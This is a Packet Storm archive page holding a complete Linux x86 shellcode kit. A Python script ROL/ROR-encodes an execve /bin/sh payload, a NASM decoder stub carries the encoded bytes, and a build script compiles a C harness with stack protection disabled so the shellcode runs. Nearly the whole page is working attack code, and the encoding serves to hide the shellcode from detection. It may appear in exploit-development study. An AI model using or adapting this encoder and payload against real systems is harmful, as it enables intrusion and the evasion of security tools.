what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux x86 /bin/sh ROL/ROR Encoded Shellcode

Linux x86 /bin/sh ROL/ROR Encoded Shellcode
Posted Aug 12, 2015
Authored by Anastasios Monachos

Custom Linux/x86 shellcode encoder/decoder that switches between ROL and ROR and spawns a /bin/sh shell using execve.

tags | shell, x86, shellcode
systems | linux
SHA-256 | f750d9d5724990b37f5c69dafcca7b214a405a569bf14bf2fefb63f2833e02d7

Linux x86 /bin/sh ROL/ROR Encoded Shellcode

Change Mirror Download
Custom shellcode encoder/decoder that switches between byte ROR and byte ROL

1. Update eRORoROL-encoder.py with your shellcode
2. Run eRORoROL-encoder.py
3. Copy output from eRORoROL-encoder.py and update eRORoROL-decoder.nasm
4. Run eRORoROL_compile.sh

-----eRORoROL-encoder.py BEGIN CODE-----
#!/usr/bin/python
# Python Custom Encoding eRORoROL
# Author: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
# Description: If index number is Even do a ROR, else do a ROL

shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

format_slash_x = ""
format_0x = ""
counter = 0

max_bits = 8
offset = 1

ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))

rol = lambda val, r_bits, max_bits: \
(val << r_bits%max_bits) & (2**max_bits-1) | \
((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

print "Shellcode encryption started ..."

for x in bytearray(shellcode):
#go through all hexadecimal values
counter += 1
print "[i] Counter: "+str(counter)
print "[i] Instruction in hex: "+ hex(x)
print "[i] Instruction in decimal: "+ str(x)

if counter%2==0: #check if index number is odd or even
print "[i] EVEN index, therefore do ROR"
rox_encoded_instruction = ror(x, offset, max_bits)
else:
print "[i] ODD index therefore do ROL"
rox_encoded_instruction = rol(x, offset, max_bits)

encoded_instruction_in_hex = '%02x' % rox_encoded_instruction
print "[i] Encoded instruction in hex: "+encoded_instruction_in_hex +"\n"

#Beautify with 0x and comma
format_0x += '0x'
format_0x += encoded_instruction_in_hex+","

print "\n[+] Shellcode custom encoding done"
print "\n[i] Initial shellcode length: %d" % len(bytearray(shellcode))
length_format_0x = format_0x.count(',')
print "[i] Encoded format 0x Length: %d" % length_format_0x
print "[i] Encoded format 0x:\t"+ format_0x

if "0x0," in format_0x: print "\n[!] :( WARNING: Output shellcode contains NULL byte(s), consider re-encoding with different offset."
else: print "\n[i] :) Good to go, no NULL bytes detected in output"

print "\n[i] Done!"
-----eRORoROL-encoder.py END CODE-----


-----eRORoROL-decoder.nasm BEGIN CODE-----
; Title: eRORoROL-decoder.nasm
; Author: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
; Description: If index number is Even do a ROR, else do a ROL

global _start

section .text
_start:
jmp short call_shellcode

decoder:
pop esi ;shellcode on ESI
xor ecx,ecx ;our loop counter
mov cl, shellcode_length ;mov cl, 25;shellcode_length 25 bytes

check_even_odd:
test si, 01h ;perform (si & 01h) discarding the result but set the eflags
;set ZF to 1 if (the least significant bit of SI is 0)
;EVEN: if_least_significant_bit_of_SI_is_0 AND 01h: result is 0 then ZF=0)
;ODD: if_least_significant_bit_of_SI_is_1 AND 01h: result is 1 then ZF=1)
je even_number ;if SI==0 then the number is even
;else execute the odd number section

odd_number:
rol byte [esi], 0x1 ;rol decode with 1 offset
jmp short inc_dec

even_number:
ror byte [esi], 0x1 ;ror decode with 1 offset

inc_dec:
inc esi ;next instruction in the encoded shellcode
loop check_even_odd ;loop uses ECX for counter
jmp short shellcode

call_shellcode:
call decoder
shellcode: db 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01
shellcode_length equ $-shellcode

-----eRORoROL-decoder.nasm END CODE-----

-----eRORoROL_compile.sh BEGIN CODE-----
#!/bin/bash
echo '[+] Assembling with Nasm ... '
nasm -f elf32 -o $1.o $1.nasm

echo '[+] Linking ...'
ld -melf_i386 -o $1 $1.o

echo '[+] Dumping shellcode ...'

echo '' > shellcode.nasm
for i in `objdump -d $1 | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" >> shellcode.nasm; done

echo '[+] Creating new shellcode.c ...'
cat > shellcode.c <<EOF
#include<stdio.h>
#include<string.h>
unsigned char code[] ="\\
EOF
echo -n "\\" >> shellcode.c
cat shellcode.nasm >> shellcode.c

cat >> shellcode.c <<EOF
";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
EOF

echo '[+] Compiling shellcode.c ...'
gcc -fno-stack-protector -z execstack -m32 -o shellcode shellcode.c

echo '[+] Done! Run ./shellcode to execute!'
-----eRORoROL_compile.sh END CODE-----
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close